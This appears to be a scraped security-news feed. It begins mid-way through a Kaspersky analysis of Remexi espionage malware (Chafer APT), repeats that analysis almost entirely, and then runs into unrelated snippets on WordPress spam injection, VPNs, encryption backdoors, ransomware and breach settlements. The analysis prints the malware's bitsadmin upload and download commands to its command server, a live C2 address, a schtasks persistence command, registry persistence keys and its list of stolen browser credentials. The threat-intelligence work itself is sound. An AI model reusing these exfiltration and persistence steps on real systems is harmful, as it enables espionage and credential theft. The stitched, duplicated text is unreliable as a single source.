To decrypt the configuration data, the malware uses XOR with 25-character keys such as “waEHleblxiQjoxFJQaIMLdHKz” that are different for every sample. RC4 file encryption relies on the Windows 32 CryptoAPI, using the provided value’s MD5 hash as an initial vector. Among all these random keys once the word “salamati” was also used, which means “health” in Farsi.

Configuration

Config.ini is the file where the malware stores its encrypted configuration data. It contains the following fields:

Field Sample value Description
diskFullityCheckRatio 1.4 Malware working directory size threshold. It will be deleted if it becomes as large as the free available space multiplied by this ratio
captureScreenTimeOut 72 Probability of full and active window screenshots being taken after mouse click
captureActiveWindowTimeOut 313
captureScreenQC 40 Not really used. Probably full and active window screenshot quality
captureActiveQC 40
CaptureSites VPN*0,0
Login*0,0
mail*0,0
Security*0,0
Window titles of interest for screenshots, using left mouse button and Enter keypress hook
important upLog.txt
upSCRLog.txt
upSpecial.txt
upFile.txt
upMSLog.txt
List of files to send to C2 using bitsadmin.exe from the dedicated thread
maxUpFileSizeKByte 1000000 Maximum size of file uploaded to C2
Servers http://108.61.189.174 Control server HTTP URL
ZipPass KtJvOXulgibfiHk Password for uploaded zip archives
browserPasswordCheckTimeout 300000 Milliseconds to wait between gathering key3.db, cookies.sqlite and other browser files in dedicated thread

Most of the parameters are self-explanatory. However, captureScreenTimeOut and captureActiveWindowTimeOut are worth describing in more detail as their programming logic is not so intuitive.

One of the malware threads checks in an infinite loop if the mouse button was pressed and then also increments the integer iterator infinitely. If the mouse hooking function registers a button hit, it lets the screenshotting thread know about it through a global variable. After that, it checks if the iterator divided by (captureScreenTimeOut/captureActiveWindowTimeOut) has a remainder of 0. In that case, it takes a screenshot.

Main module (events.exe)

SHA256 b1fa803c19aa9f193b67232c9893ea57574a2055791b3de9f836411ce000ce31
MD5 c981273c32b581de824e1fd66a19a281
Compiled GCC compiler in MinGW environment version 2.24, timestamp set to 1970 by compiler
Type I386 Windows GUI EXE
Size 68 608

After checking that the malware is not already installed, it unpacks HCK.cab using the Microsoft standard utility expand.exe with the following arguments:

expand.exe -r \"<full path to HCK.cab>\" -f:* \"<event_cache_dir_path>\\\"

Then it decrypts config.ini file with a hardcoded 25-byte XOR key that differs for every sample. It sets keyboard and mouse hooks to its handlekeys() and MouseHookProc() functions respectively and starts several working threads:

ID Thread description
1 Gets commands from C2 and saves them to a file and system registry using the bitsadmin.exe utility
2 Decrypts command from registry using RC4 with a hardcoded key, and executes it
3 Transfers screenshots from the clipboard to \Cache005 subdirectory and Unicode text from clipboard to log.txt, XOR-ed with the “salamati” key (“health” in Farsi)
4 Transfers screenshots to \Cache005 subdirectory with captureScreenTimeOut and captureScreenTimeOut frequencies
5 Checks network connection, encrypts and sends gathered logs
6 Unhooks mouse and keyboard, removes bitsadmin task
7 Checks if malware’s working directory size already exceeds its threshold
8 Gathers victim´s credentials, visited website cache, decrypted Chrome login data, as well as Firefox databases with cookies, keys, signons and downloads

The malware uses the following command to receive data from its C2:

bitsadmin.exe /TRANSFER HelpCenterDownload /DOWNLOAD /PRIORITY normal <server> <file>
http://<server_config>/asp.asp?ui=<host_name>nrg-<adapter_info>-<user_name>

Activity logging module (Splitter.exe)

This module is called from the main thread to obtain screenshots of windows whose titles are specified in the configuration CaptureSites field, bitmaps and text from clipboard, etc.

SHA256 a77f9e441415dbc8a20ad66d4d00ae606faab370ffaee5604e93ed484983d3ff
MD5 1ff40e79d673461cd33bd8b68f8bb5b8
Compiled 2017.08.06 11:32:36 (GMT), 2.22
Type I386 Windows Console EXE
Size 101 888

Instead of implementing this auxiliary module in the form of a dynamic linked library with its corresponding exported functions, the developers decided to use a standalone executable started by events.exe with the following parameters:

Parameter Description
-scr Screenshot file name to save in Cache006 subdirectory, zipped with password from configuration. Can capture all screen (“AllScreen”) or the active window (“ActiveWindow”)
-ms Screenshot file name to save in Cache006 subdirectory, zipped with password from configuration. Specifies the screen coordinates to take
-zip Name of password (from configuration data) protected zip archive
-clipboard Screenshot file name where a bitmap from the clipboard is saved in Cache005 subdirectory, zipped with password from configuration

Data exfiltration

Exfiltration is done through the bitsadmin.exe utility. The BITS mechanism has existed since Windows XP up to the current Windows 10 versions and was developed to create download/upload jobs, mostly to update the OS itself. The following is the command used to exfiltrate data from the victim to the C2:

bitsadmin.exe /TRANSFER HelpCenterUpload /UPLOAD /PRIORITY normal "<control_server>/YP01_<victim_fingerprint>_<log_file_name>" "<log_file_name>"

Victims

The vast majority of the users targeted by this new variant of Remexi appear to have Iranian IP addresses. Some of these appear to be foreign diplomatic entities based in the country.

Attribution

The Remexi malware has been associated with an APT actor called Chafer by Symantec.

One of the human-readable encryption keys used is “salamati”. This is probably the Latin spelling for the word “health” in Farsi. Among the artifacts related to malware authors, we found in the binaries a .pdb path containing the Windows user name “Mohamadreza New”. Interestingly, the FBI website for wanted cybercriminals includes two Iranians called Mohammad Reza, although this could be a common name or even a false flag.

Conclusions

Activity of the Chafer APT group has been observed since at least 2015, but based on things like compilation timestamps and C&C registration, it’s possible they have been active for even longer. Traditionally, Chafer has been focusing on targets inside Iran, although their interests clearly include other countries in the Middle East.

We will continue to monitor how this set of activity develops in the future.

Indicators of compromise

File hashes

events.exe
028515d12e9d59d272a2538045d1f636
03055149340b7a1fd218006c98b30482
25469ddaeff0dd3edb0f39bbe1dcdc46
41b2339950d50cf678c0e5b34e68f537
4bf178f778255b6e72a317c2eb8f4103
7d1efce9c06a310627f47e7d70543aaf
9f313e8ef91ac899a27575bc5af64051
aa6246dc04e9089e366cc57a447fc3a4
c981273c32b581de824e1fd66a19a281
dcb0ea3a540205ad11f32b67030c1e5a

splitter.exe
c6721344af76403e9a7d816502dca1c8
d3a2b41b1cd953d254c0fc88071e5027
1FF40E79D673461CD33BD8B68F8BB5B8
ecae141bb068131108c1cd826c82d88b
12477223678e4a41020e66faebd3dd95
460211f1c19f8b213ffaafcdda2a7295
53e035273164f24c200262d61fa374ca

Domains and IPs

108.61.189.174

Hardcoded mutexes

Local\TEMPDAHCE01
Local\zaapr
Local\reezaaprLog
Local\{Temp-00-aa-123-mr-bbb}

Scheduled task

CacheTask_<user_name_here>

Directory with malicious modules

Main malware directory: %APPDATA%\Microsoft\Event Cache
Commands from C2 in subdirectory: Cache001\cde00.acf

Events.exe persistence records in Windows system registry keys

HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Activity Manager

Victims’ fingerprints stored in

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\PidRegData or
HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\PidRegData

RC4 encrypted C2 commands stored in

HKCU\SOFTWARE\Microsoft\Fax

HTTP requests template

http://<server_ip_from_config>/asp.asp?ui=<host_name>nrg-<adapter_info>-<user_name>
And bitsadmin.exe task to external network resources, addressed by IP addresses

Securelist: Chafer used Remexi malware to spy on Iran-based foreign diplomatic entities

Executive Summary

Throughout the autumn of 2018 we analyzed a long-standing (and still active at that time) cyber-espionage campaign that was primarily targeting foreign diplomatic entities based in Iran. The attackers were using an improved version of Remexi in what the victimology suggests might be a domestic cyber-espionage operation. This malware has previously been associated with an APT actor that Symantec calls Chafer.

The malware can exfiltrate keystrokes, screenshots, browser-related data like cookies and history, decrypted when possible. The attackers rely heavily on Microsoft technologies on both the client and server sides: the Trojan uses standard Windows utilities like Microsoft Background Intelligent Transfer Service (BITS) bitsadmin.exe to receive commands and exfiltrate data. Its C2 is based on IIS using .asp technology to handle the victims’ HTTP requests.

Remexi developers use the C programming language and GCC compiler on Windows in the MinGW environment. They most likely used the Qt Creator IDE in a Windows environment. The malware utilizes several persistence mechanisms including scheduled tasks, Userinit and Run registry keys in the HKLM hive.

XOR and RC4 encryption is used with quite long unique keys for different samples. Among all these random keys once the word “salamati” was also used, which means “health” in Farsi.

Kaspersky Lab products detect the malware described in this report as Trojan.Win32.Remexi and Trojan.Win32.Agent. This blogpost is based in our original report shared with our APT Intelligence Reporting customers last November 2018. For more information please contact: intelreports@kaspersky.com

Technical analysis

The main tool used in this campaign is an updated version of the Remexi malware, publicly reported by Symantec back in 2015. The newest module’s compilation timestamp is March 2018. The developers used GCC compiler on Windows in the MinGW environment.

Inside the binaries the compiler left references to the names of the C source file modules used: “operation_reg.c”, “thread_command.c” and “thread_upload.c”. Like mentioned in modules file names the malware consists of several working threads dedicated to different tasks, including C2 command parsing and data exfiltration. For both the receiving of C2 commands and exfiltration, Remexi uses the Microsoft Background Intelligent Transfer Service (BITS) mechanism to communicate with the C2 over HTTP.

Proliferation

So far, our telemetry hasn’t provided any concrete evidence that shows us how the Remexi malware spread. However, we think it’s worth mentioning that for one victim we found a correlation between the execution of Remexi´s main module and the execution of an AutoIt script compiled as PE, which we believe may have dropped the malware. This dropper used an FTP with hardcoded credentials to receive its payload. FTP server was not accessible any more at the time of our analysis.

Malware features

Remexi boasts features that allow it to gather keystrokes, take screenshots of windows of interest (as defined in its configuration), steal credentials, logons and the browser history, and execute remote commands. Encryption consists of XOR with a hardcoded key for its configuration and RC4 with a predefined password for encrypting the victim’s data.

Remexi includes different modules that it deploys in its working directory, including configuration decryption and parsing, launching victim activity logging in a separate module, and seven threads for various espionage and auxiliary functions. The Remexi developers seem to rely on legitimate Microsoft utilities, which we enumerate in the table below.

Utility Usage
extract.exe Deploys modules from the .cab file into the working Event Cache directory
bitsadmin.exe Fetches files from the C2 server to parse and execute commands. Send exfiltrated data
taskkill.exe Ends working cycle of modules

Persistence

Persistence modules are based on scheduled tasks and system registry. Mechanisms vary for different OS versions. In the case of old Windows versions like XP, main module events.exe runs an edited XPTask.vbs Microsoft sample script to create a weekly scheduled task for itself. For newer operating systems, events.exe creates task.xml as follows:

Then it creates a Windows scheduled task using the following command:

schtasks.exe /create /TN \"Events\\CacheTask_<user_name_here>" /XML \"<event_cache_dir_path>t /F"

At the system registry level, modules achieve persistence by adding themselves into the key:

HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit

when it finds possible add values to the Winlogon subkey, and in

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Activity Manager. All such indicators of comprometation are mentioned in correspondent appendix below.

Commands

All the commands received from the C2 are first saved to an auxiliary file and then stored encrypted in the system registry. The standalone thread will decrypt and execute them.

Command Description
search Searches for corresponding files
search&upload Encrypts and adds the corresponding files to the upload directory with the provided name
uploadfile Encrypts and adds the specified file to the upload directory with the provided name
uploadfolder Encrypts and adds the mentioned directory to the upload directory with the provided name
shellexecute Silently executes received command with cmd.exe
wmic Silently executes received command with wmic.exe (for WMI commands)
sendIEPass Encrypts and adds all gathered browser data into files for upload to C2
uninstall Removes files, directory and BITS tasks

Cryptography

To decrypt the configuration data, the malware uses XOR with 25-character keys such as “waEHleblxiQjoxFJQaIMLdHKz” that are different for every sample. RC4 file encryption relies on the Windows 32 CryptoAPI, using the provided value’s MD5 hash as an initial vector. Among all these random keys once the word “salamati” was also used, which means “health” in Farsi.

Configuration

Config.ini is the file where the malware stores its encrypted configuration data. It contains the following fields:

Field Sample value Description
diskFullityCheckRatio 1.4 Malware working directory size threshold. It will be deleted if it becomes as large as the free available space multiplied by this ratio
captureScreenTimeOut 72 Probability of full and active window screenshots being taken after mouse click
captureActiveWindowTimeOut 313
captureScreenQC 40 Not really used. Probably full and active window screenshot quality
captureActiveQC 40
CaptureSites VPN*0,0
Login*0,0
mail*0,0
Security*0,0
Window titles of interest for screenshots, using left mouse button and Enter keypress hook
important upLog.txt
upSCRLog.txt
upSpecial.txt
upFile.txt
upMSLog.txt
List of files to send to C2 using bitsadmin.exe from the dedicated thread
maxUpFileSizeKByte 1000000 Maximum size of file uploaded to C2
Servers http://108.61.189.174 Control server HTTP URL
ZipPass KtJvOXulgibfiHk Password for uploaded zip archives
browserPasswordCheckTimeout 300000 Milliseconds to wait between gathering key3.db, cookies.sqlite and other browser files in dedicated thread

Most of the parameters are self-explanatory. However, captureScreenTimeOut and captureActiveWindowTimeOut are worth describing in more detail as their programming logic is not so intuitive.

One of the malware threads checks in an infinite loop if the mouse button was pressed and then also increments the integer iterator infinitely. If the mouse hooking function registers a button hit, it lets the screenshotting thread know about it through a global variable. After that, it checks if the iterator divided by (captureScreenTimeOut/captureActiveWindowTimeOut) has a remainder of 0. In that case, it takes a screenshot.

Main module (events.exe)

SHA256 b1fa803c19aa9f193b67232c9893ea57574a2055791b3de9f836411ce000ce31
MD5 c981273c32b581de824e1fd66a19a281
Compiled GCC compiler in MinGW environment version 2.24, timestamp set to 1970 by compiler
Type I386 Windows GUI EXE
Size 68 608

After checking that the malware is not already installed, it unpacks HCK.cab using the Microsoft standard utility expand.exe with the following arguments:

expand.exe -r \"<full path to HCK.cab>\" -f:* \"<event_cache_dir_path>\\\"

Then it decrypts config.ini file with a hardcoded 25-byte XOR key that differs for every sample. It sets keyboard and mouse hooks to its handlekeys() and MouseHookProc() functions respectively and starts several working threads:

ID Thread description
1 Gets commands from C2 and saves them to a file and system registry using the bitsadmin.exe utility
2 Decrypts command from registry using RC4 with a hardcoded key, and executes it
3 Transfers screenshots from the clipboard to \Cache005 subdirectory and Unicode text from clipboard to log.txt, XOR-ed with the “salamati” key (“health” in Farsi)
4 Transfers screenshots to \Cache005 subdirectory with captureScreenTimeOut and captureScreenTimeOut frequencies
5 Checks network connection, encrypts and sends gathered logs
6 Unhooks mouse and keyboard, removes bitsadmin task
7 Checks if malware’s working directory size already exceeds its threshold
8 Gathers victim´s credentials, visited website cache, decrypted Chrome login data, as well as Firefox databases with cookies, keys, signons and downloads

The malware uses the following command to receive data from its C2:

bitsadmin.exe /TRANSFER HelpCenterDownload /DOWNLOAD /PRIORITY normal <server> <file>
http://<server_config>/asp.asp?ui=<host_name>nrg-<adapter_info>-<user_name>

Activity logging module (Splitter.exe)

This module is called from the main thread to obtain screenshots of windows whose titles are specified in the configuration CaptureSites field, bitmaps and text from clipboard, etc.

SHA256 a77f9e441415dbc8a20ad66d4d00ae606faab370ffaee5604e93ed484983d3ff
MD5 1ff40e79d673461cd33bd8b68f8bb5b8
Compiled 2017.08.06 11:32:36 (GMT), 2.22
Type I386 Windows Console EXE
Size 101 888

Instead of implementing this auxiliary module in the form of a dynamic linked library with its corresponding exported functions, the developers decided to use a standalone executable started by events.exe with the following parameters:

Parameter Description
-scr Screenshot file name to save in Cache006 subdirectory, zipped with password from configuration. Can capture all screen (“AllScreen”) or the active window (“ActiveWindow”)
-ms Screenshot file name to save in Cache006 subdirectory, zipped with password from configuration. Specifies the screen coordinates to take
-zip Name of password (from configuration data) protected zip archive
-clipboard Screenshot file name where a bitmap from the clipboard is saved in Cache005 subdirectory, zipped with password from configuration

Data exfiltration

Exfiltration is done through the bitsadmin.exe utility. The BITS mechanism has existed since Windows XP up to the current Windows 10 versions and was developed to create download/upload jobs, mostly to update the OS itself. The following is the command used to exfiltrate data from the victim to the C2:

bitsadmin.exe /TRANSFER HelpCenterUpload /UPLOAD /PRIORITY normal "<control_server>/YP01_<victim_fingerprint>_<log_file_name>" "<log_file_name>"

Victims

The vast majority of the users targeted by this new variant of Remexi appear to have Iranian IP addresses. Some of these appear to be foreign diplomatic entities based in the country.

Attribution

The Remexi malware has been associated with an APT actor called Chafer by Symantec.

One of the human-readable encryption keys used is “salamati”. This is probably the Latin spelling for the word “health” in Farsi. Among the artifacts related to malware authors, we found in the binaries a .pdb path containing the Windows user name “Mohamadreza New”. Interestingly, the FBI website for wanted cybercriminals includes two Iranians called Mohammad Reza, although this could be a common name or even a false flag.

Conclusions

Activity of the Chafer APT group has been observed since at least 2015, but based on things like compilation timestamps and C&C registration, it’s possible they have been active for even longer. Traditionally, Chafer has been focusing on targets inside Iran, although their interests clearly include other countries in the Middle East.

We will continue to monitor how this set of activity develops in the future.

Indicators of compromise

File hashes

events.exe
028515d12e9d59d272a2538045d1f636
03055149340b7a1fd218006c98b30482
25469ddaeff0dd3edb0f39bbe1dcdc46
41b2339950d50cf678c0e5b34e68f537
4bf178f778255b6e72a317c2eb8f4103
7d1efce9c06a310627f47e7d70543aaf
9f313e8ef91ac899a27575bc5af64051
aa6246dc04e9089e366cc57a447fc3a4
c981273c32b581de824e1fd66a19a281
dcb0ea3a540205ad11f32b67030c1e5a

splitter.exe
c6721344af76403e9a7d816502dca1c8
d3a2b41b1cd953d254c0fc88071e5027
1FF40E79D673461CD33BD8B68F8BB5B8
ecae141bb068131108c1cd826c82d88b
12477223678e4a41020e66faebd3dd95
460211f1c19f8b213ffaafcdda2a7295
53e035273164f24c200262d61fa374ca

Domains and IPs

108.61.189.174

Hardcoded mutexes

Local\TEMPDAHCE01
Local\zaapr
Local\reezaaprLog
Local\{Temp-00-aa-123-mr-bbb}

Scheduled task

CacheTask_<user_name_here>

Directory with malicious modules

Main malware directory: %APPDATA%\Microsoft\Event Cache
Commands from C2 in subdirectory: Cache001\cde00.acf

Events.exe persistence records in Windows system registry keys

HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Activity Manager

Victims’ fingerprints stored in

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\PidRegData or
HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\PidRegData

RC4 encrypted C2 commands stored in

HKCU\SOFTWARE\Microsoft\Fax

HTTP requests template

http://<server_ip_from_config>/asp.asp?ui=<host_name>nrg-<adapter_info>-<user_name>
And bitsadmin.exe task to external network resources, addressed by IP addresses



Securelist

Spam Injector Disguised as License Key in WordPress Website

Spam Injector Disguised as License Key in WordPress Website

Here at Sucuri, we clean WordPress websites every day. There are various types of common malware, but when we stumble upon a different scenario, our research team likes to dig deeper and conduct a complete investigation.

A license key is a place where a webmaster might not expect to find an infection, however, in this particular case, this is where we found one.

A Spam Injector Resembling a License Key

A client opened a malware removal ticket reporting some weird spam URLs injected onto their WordPress website.

Continue reading Spam Injector Disguised as License Key in WordPress Website at Sucuri Blog.

Cybersecurity Experts Share Insight For Data Privacy Day 2019

You’ll have to forgive my ignorance—but what is an appropriate gift for Data Privacy Day? Perhaps an encrypted portable drive? That might not be a bad idea, but what I have

The post Cybersecurity Experts Share Insight For Data Privacy Day 2019 appeared first on The Cyber Security Place.

What steps consumers need to take to protect themselves online

Yesterday was Data Privacy Day, so McAfee warned consumers that cybercriminals are continuing to access personal information through weak passwords, phishing emails, connected things, malicious apps and unsecure Wi-Fi networks. Weak Passwords Consumers often pick simple passwords for the multiple accounts they use daily, not realizing that choosing weak passwords can open the door to identity theft and identity. Tip: Use strong passwords that include uppercase and lowercase letters, numbers and symbols. Don’t use the … More

The post What steps consumers need to take to protect themselves online appeared first on Help Net Security.

What If Your VPN Keeps Logs and Why You Should Care

By David Balaban

Have you ever asked yourself the question: “So what if my VPN keeps logs?” Don’t worry. It’s a good question to ask. It means you’re actually curious about the nuances of data collection, management and how they affect you. In order to answer this question, we first have to delve into the inner workings of […]

This is a post from HackRead.com Read the original post: What If Your VPN Keeps Logs and Why You Should Care

Merging WhatsApp, Instagram, And Facebook Messenger – Zuckerberg’s Uncanny Idea

This one may not be good news for many. Zuckerberg has finally disclosed his idea of merging the three key

Merging WhatsApp, Instagram, And Facebook Messenger – Zuckerberg’s Uncanny Idea on Latest Hacking News.

A Look Into Why Free VPN’s Can Cause More Harm Than Good

Intrusion, falsified encryption and lack of transparency are just some of the flaws a user potentially receives with a free

A Look Into Why Free VPN’s Can Cause More Harm Than Good on Latest Hacking News.

Hacking the GCHQ Backdoor

Last week, I evaluated the security of a recent GCHQ backdoor proposal for communications systems. Furthering the debate, Nate Cardozo and Seth Schoen of EFF explain how this sort of backdoor can be detected:

In fact, we think when the ghost feature is active­ -- silently inserting a secret eavesdropping member into an otherwise end-to-end encrypted conversation in the manner described by the GCHQ authors­ -- it could be detected (by the target as well as certain third parties) with at least four different techniques: binary reverse engineering, cryptographic side channels, network-traffic analysis, and crash log analysis. Further, crash log analysis could lead unrelated third parties to find evidence of the ghost in use, and it's even possible that binary reverse engineering could lead researchers to find ways to disable the ghost capability on the client side. It should be obvious that none of these possibilities are desirable for law enforcement or society as a whole. And while we've theorized some types of mitigations that might make the ghost less detectable by particular techniques, they could also impose considerable costs to the network when deployed at the necessary scale, as well as creating new potential security risks or detection methods.

Other critiques of the system were written by Susan Landau and Matthew Green.

EDITED TO ADD (1/26): Good commentary on how to defeat the backdoor detection.

Encryption is key to protecting information as it travels outside the network

A new Vera report reveals stark numbers behind the mounting toll of data breaches triggered by cybercrime and accidents. One of the most recognized and mandated security controls, installed encryption tools protect

The post Encryption is key to protecting information as it travels outside the network appeared first on The Cyber Security Place.

El Chapo’s Encryption Defeated by Turning His IT Consultant

Impressive police work:

In a daring move that placed his life in danger, the I.T. consultant eventually gave the F.B.I. his system's secret encryption keys in 2011 after he had moved the network's servers from Canada to the Netherlands during what he told the cartel's leaders was a routine upgrade.

A Dutch article says that it's a BlackBerry system.

El Chapo had his IT person install "...spyware called FlexiSPY on the 'special phones' he had given to his wife, Emma Coronel Aispuro, as well as to two of his lovers, including one who was a former Mexican lawmaker." That same software was used by the FBI when his IT person turned over the keys. Yet again we learn the lesson that a backdoor can be used against you.

And it doesn't have to be with the IT person's permission. A good intelligence agency can use the IT person's authorizations without his knowledge or consent. This is why the NSA hunts sysadmins.

Slashdot thread. Hacker News thread. Boing Boing post.

Safeguard Encryption “worth checking out” says SC Magazine

SC Magazine’s labs team has taken a look at Sophos Safeguard Encryption. We’re delighted to say they scored the product a massive 4.75 out of 5! …adding the extra layer of file security, location-based file encryption and application-based encryption, makes this product worth checking out. You can read the full review here. If you’re looking […]

Del Rio City Hall Disables Internet Connection for All Departments after Ransomware Attack

Officials in the City of Del Rio have disabled the internet connection for all departments at City Hall following a ransomware attack. The City of Del Rio, which is located 152 miles west of San Antonio in Val Verde County, Texas, posted a statement to its website disclosing the attack. Its statement mainly offers insight […]… Read More

The post Del Rio City Hall Disables Internet Connection for All Departments after Ransomware Attack appeared first on The State of Security.

Alex Stamos on Content Moderation and Security

Former Facebook CISO Alex Stamos argues that increasing political pressure on social media platforms to moderate content will give them a pretext to turn all end-to-end crypto off -- which would be more profitable for them and bad for society.

If we ask tech companies to fix ancient societal ills that are now reflected online with moderation, then we will end up with huge, democratically-unaccountable organizations controlling our lives in ways we never intended. And those ills will still exist below the surface.

Opinion: Back to the Start for 2FA Adoption?

In a previous post, Tripwire asked contributors what their most memorable event of 2018 was. As a follow-up, guest author Bob Covello expands on his thoughts about two-factor authentication (2FA). We in the infosec community have made enormous progress towards getting multi-factor authentication the recognition it deserves. All the respected folks in the community have […]… Read More

The post Opinion: Back to the Start for 2FA Adoption? appeared first on The State of Security.

Malvertising Campaign Delivers Vidar Information Stealer and GandCrab Ransomware

Researchers have spotted a malvertising campaign that is delivering two payloads to victims: the Vidar information stealer and GandCrab ransomware.

Near the end of 2018, Malwarebytes Labs began tracking a malvertising campaign delivering a variety of payloads. Researchers analyzed the infection chain and traced it to the Fallout exploit kit. They observed this package downloading what they thought was the Arkei stealer, but a closer look revealed the malware to be Vidar, a customizable stealer of passwords, credit card details and digital wallet credentials.

At that point, Malwarebytes analysts looked into Vidar’s command-and-control (C&C) server, discovering that the attacks were retrieving GandCrab ransomware from that location. This sequence of events enables threat actors to first steal victims’ personal and financial information before extorting them for the return of their encrypted data.

A Busy Few Months for the Fallout Exploit Kit

The Fallout exploit kit has been busy over the past few months. In September 2018, FireEye observed the exploit kit targeting users in Japan, Korea, the Middle East, Southern Europe and other countries in the Asia-Pacific region. In that campaign, Fallout infected victims with GandCrab ransomware.

This package of exploits didn’t waste time in diversifying its payloads. Researchers at McAfee observed Fallout exposing users to Kraken ransomware in October 2018. That same month, Palo Alto Networks detected a campaign in which the exploit kit delivered Azorult malware, another threat capable of stealing important information.

How to Block GandCrab and Other Malvertising Payloads

As it continues to evolve, the Fallout exploit kit will likely begin delivering even more payloads. Security professionals should therefore help protect their organizations by consistently leveraging the four steps of vulnerability assessment to keep software up-to-date. Organizations should also help defend against ransomware like GandCrab by using an endpoint management solution to monitor their IT assets for suspicious activity.

The post Malvertising Campaign Delivers Vidar Information Stealer and GandCrab Ransomware appeared first on Security Intelligence.

Abine says Blur Password Manager User Information Exposed

Customers who use the Blur secure password manager by Abine may have had sensitive information leaked, according to a statement by Abine, the company that makes the product. 

The post Abine says Blur Password Manager User Information Exposed appeared first on The Security Ledger.

Related Stories

Judge Grants Final Approval of Record Data Breach Settlement in Anthem Class Action

On August 15, 2018, U.S. District Judge Lucy Koh signed an order granting final approval of the record $115 million class action settlement agreed to by Anthem Inc. in June 2017. As previously reported, Judge Koh signed an order granting preliminary approval of the settlement in August 2017.

The settlement arose out of a 2015 data breach that exposed the personal information of more than 78 million individuals, including names, dates of birth, Social Security numbers and health care ID numbers. The terms of the settlement include, among other things, the creation of a pool of funds to provide credit monitoring and reimbursement for out-of-pocket costs for customers.

“The Court finds that the Settlement is fair, adequate, and reasonable,” Judge Lucy Koh wrote in her opinion.

Under the $115 million settlement, $51 million will go to the victims. Of the $51 million, $17 million is earmarked for credit-monitoring services, $15 million will go to customers who suffered out-of-pocket costs from the data breach, and $13 million will go to customers who demonstrate that they already have credit-monitoring services. The judge awarded the plaintiffs’ attorneys $31.05 million in legal fees. Additionally, the consulting firm appointed to administer the settlement received $23 million.

The settlement also requires Anthem to make certain changes to its data security systems and cybersecurity practices, including adopting encryption protocols for sensitive data, for at least three years.

The case is In re Anthem, Inc. Data Breach Litig., N.D. Cal., No. 15-md-02617, final approval 8/15/18.

Application Development GDPR Compliance Guidance

Last week IBM developerWorks released a three-part guidance series I have written to help 
Application Developers develop GDPR compliant applications.

Developing GDPR Compliant Applications Guidance

The GDPR
The General Data Protection Regulation (GDPR) was created by the European Commission and Council to strengthen and unify Europe's data protection law, replacing the 1995 European Data Protection Directive. Although the GDPR is a European Union (EU) regulation, it applies to any organizations outside of Europe that handle the personal data of EU citizens. This includes the development of applications that are intended to process the personal information of EU citizens. Therefore, organizations that provide web applications, mobile apps, or traditional desktop applications that can indirectly process EU citizen's personal data or allow EU citizens sign in are subject to the GDPR's privacy obligations. Organizations face the prospect of powerful sanctions should applications fail to comply with the GDPR.

Part 1: A Developer's Guide to the GDPR
Part 1 summarizes the GDPR and explains how the privacy regulation impacts and applies to developing and supporting applications that are intended to be used by European Union citizens.

Part 2: Application Privacy by Design
Part 2 provides guidance for developing applications that are compliant with the European Union’s General Data Protection Regulation. 

Part 3: Minimizing Application Privacy Risk

Part 3  provides practical application development techniques that can alleviate an application's privacy risk.

Weekly Cyber Risk Roundup: Payment Card Breaches, Encryption Debate, and Breach Notification Laws

This past week saw the announcement of several new payment card breaches, including a point-of-sale breach at Applebee’s restaurants that affected 167 locations across 15 states.

The malware, which was discovered on February 13, 2018, was “designed to capture payment card information and may have affected a limited number of purchases” made at Applebee’s locations owned by RMH Franchise Holdings, the company said in a statement.

News outlets reported many of the affected locations had their systems infected between early December 2017 and early January 2018. Applebee’s has close to 2,000 locations around the world and 167 of them were affected by the incident.

In addition to Applebees, MenuDrive issued a breach notification to merchants saying that its desktop ordering site was injected with malware designed to capture payment card information. The incident impacted certain transactions from November 5, 2017 to November 28, 2017.

“We have learned that the malware was contained to ONLY the Desktop ordering site of the version that you are using and certain payment gateways,” the company wrote. “Thus, this incident was contained to a part of our system and did NOT impact the Mobile ordering site or any other MenuDrive versions.”

Finally, there is yet another breach notification related to Sabre Hospitality Solutions’ SynXis Central Reservations System — this time affecting Preferred Hotels & Resorts. Sabre said that a unauthorized individual used compromised user credentials to view reservation information, including payment card information, for a subset of hotel reservations that Sabre processed on behalf of the company between June 2016 and November 2017.

2018-03-10_ITTGroups

Other trending cybercrime events from the week include:

  • Marijuana businesses targeted: MJ Freeway Business Solutions, which provides business management software to cannabis dispensaries, is notifying customers of unauthorized access to its systems that may have led to personal information being stolen. The Canadian medical marijuana delivery service JJ Meds said that it received an extortion threat demanding $1,000 in bitcoin in order to prevent a leak of customer information.
  • Healthcare breach notifications: The Kansas Department for Aging and Disability Services said that the personal information of 11,000 people was improperly emailed to local contractors by a now-fired employee. Front Range Dermatology Associates announced a breach related to a now-fired employee providing patient information to a former employee. Investigators said two Florida Hospital employees stole patient records, and local news reported that 9,000 individuals may have been impacted by the theft.
  • Notable data breaches: Ventiv Technology, which provides workers’ compensation claim management software solutions, is notifying customers of a compromise of employee email accounts that were hosted on Office365 and contained personal information. Catawba County services employees had their personal information compromised due to the payroll and human resources system being infected with malware. Flexible Benefit Service Corporation said that an employee email account was compromised and used to search for wire payment information. A flaw in Nike’s website allowed attackers to read server data and could have been leveraged to gain greater access to the company’s systems. A researcher claimed that airline Emirates is leaking customer data.
  • Other notable events: Cary E. Williams CPA is notifying employees, shareholders, trustees and partners of a ransomware attack that led to unauthorized access to its systems. The cryptocurrency exchange Binance said that its users were the target of “a large scale phishing and stealing attempt” and those compromised accounts were used to perform abnormal trading activity over a short period of time. The spyware company Retina-X Studios said that it “is immediately and indefinitely halting its PhoneSheriff, TeenShield, SniperSpy and Mobile Spy products” after being “the victim of sophisticated and repeated illegal hackings.”

SurfWatch Labs collected data on many different companies tied to cybercrime over the past week. Some of the top trending targets are shown in the chart below.

2018-03-10_ITT

Cyber Risk Trends From the Past Week

2018-03-10_RiskScores

There were several regulatory stories that made headlines this week, including the FBI’s continued push for a stronger partnership with the private sector when it comes to encryption, allegations that Geek Squad techs act as FBI spies, and new data breach notification laws.

In a keynote address at Boston College’s cybersecurity summit, FBI Director Christopher Wray said that there were 7,775 devices that the FBI could not access due to encryption in fiscal 2017, despite having approval from a judge. According to Fry, that meant the FBI could not access more than half of the devices they tried to access during the period.

